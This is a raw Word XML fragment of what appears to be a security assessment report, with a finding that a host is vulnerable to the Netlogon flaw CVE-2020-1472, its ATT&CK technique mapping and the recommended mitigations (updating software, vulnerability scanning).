                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>AT:N</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="502D654C">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>/</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="502D654C">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>PR:N</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="502D654C">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>/</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="502D654C">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>UI:N</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="502D654C">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>/</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="502D654C">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>VC:</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r w:rsidRPr="0D325B6E" w:rsidR="502D654C">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>VI:</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r w:rsidRPr="0D325B6E" w:rsidR="502D654C">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>VA:</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r w:rsidRPr="0D325B6E" w:rsidR="502D654C">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>SC:</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r w:rsidRPr="0D325B6E" w:rsidR="502D654C">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>SI:</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r w:rsidRPr="0D325B6E" w:rsidR="502D654C">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>SA:</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="502D654C">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>H</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="57239F01">
        <w:trPr>
          <w:trHeight w:val="692"/>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9240558" w14:textId="3C6119A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748AD97" w:rsidP="0D325B6E" w:rsidRDefault="7748AD97" w14:paraId="1F7B8B0C" w14:textId="5D20DBB8">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidR="7748AD97">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2C242F7" w:rsidP="0D325B6E" w:rsidRDefault="72C242F7" w14:paraId="48C9BFD2" w14:textId="678EBCF5">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:u w:val="none"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R0d8564cd65944aa5">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="72C242F7">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>T1</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="35938F53">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>210</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="4B6E6179">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>:</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="7B6EB47F">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72C242F7">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Exploit</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="7B6EB47F">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ation of Remote Services</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="36CEDE2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2C16AA90"/>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2312825" w:rsidP="0D325B6E" w:rsidRDefault="22312825" w14:paraId="535A15A1" w14:textId="389EFC32">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidR="22312825">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F7FC610" w:rsidP="0D325B6E" w:rsidRDefault="2F7FC610" w14:paraId="4AB8219C" w14:textId="5D8B6777">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="Rc3b1825d35a64083">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="2F7FC610">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>M1051: Update Software</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="073E341E" w:rsidP="0D325B6E" w:rsidRDefault="073E341E" w14:paraId="46890DF6" w14:textId="5186973A">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="0070C0"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="Rb0062581de954dcb">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="073E341E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>M1016: Vulnerability Scanning</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="1B7F1BDA">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3FBCB3C" w14:textId="43379D9B">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3117ACA" w14:textId="030512B0">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0A010D15" w14:textId="351B54DE">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="4A735DCF" w:rsidP="0D325B6E" w:rsidRDefault="4A735DCF" w14:paraId="110D72C6" w14:textId="0B51101F">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735DC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F870837" w:rsidP="0D325B6E" w:rsidRDefault="3F870837" w14:paraId="61D79FBD" w14:textId="526420E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noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3F87083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The </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0897FC38">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affected </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3F87083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host </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="31646ED2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:strike w:val="0"/>
          <w:dstrike w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is vulnerable</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="31646ED2">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to C</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="31646ED2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:strike w:val="0"/>
          <w:dstrike w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>VE-2</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="31646ED2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:strike w:val="0"/>
          <w:dstrike w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>020-</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="31646ED2">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1472 due to an outdated </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3F87083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version of the </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3F870837">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:strike w:val="0"/>
          <w:dstrike w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Netlogon</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3F87083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Remote Protocol service</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="25DEE572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:strike w:val="0"/>
          <w:dstrike w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="25DEE572">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3F17248C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:strike w:val="0"/>
          <w:dstrike w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This vulnerability allows an unauthorized attacker</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="329C02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to gain</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0D1033D6">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full</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="329C021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1F4EF370">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administrative </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="329C021F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:strike w:val="0"/>
          <w:dstrike w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>control of the domain controller</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6807FA50">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due to a </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6807FA50">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:strike w:val="0"/>
          <w:dstrike w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cryptographic</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3B329BD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flaw in the </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3B329BDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:strike w:val="0"/>
          <w:dstrike w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Netlogon</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3B329BDF">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protocol</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6F7E0842">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p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="622EBA2C" w14:textId="495D70B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735DCF" w:rsidP="0D325B6E" w:rsidRDefault="4A735DCF" w14:paraId="1FEAB7EA" w14:textId="48FA5D1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735DC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C67BC47" w:rsidP="0D325B6E" w:rsidRDefault="0C67BC47" w14:paraId="1284661D" w14:textId="7D1ABB6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67BC47">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attacker to gain control of </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5390A18E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>all</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0C67BC47">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> machine</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="11C25D1C">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C67BC47">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> that </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="55F61BA9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>are</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0C67BC47">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> joined to the domain controller. </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="2E8F7034">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This poses serious threats to data protection and sensitive information on any domain joined machine. It can also c</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3196A370">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
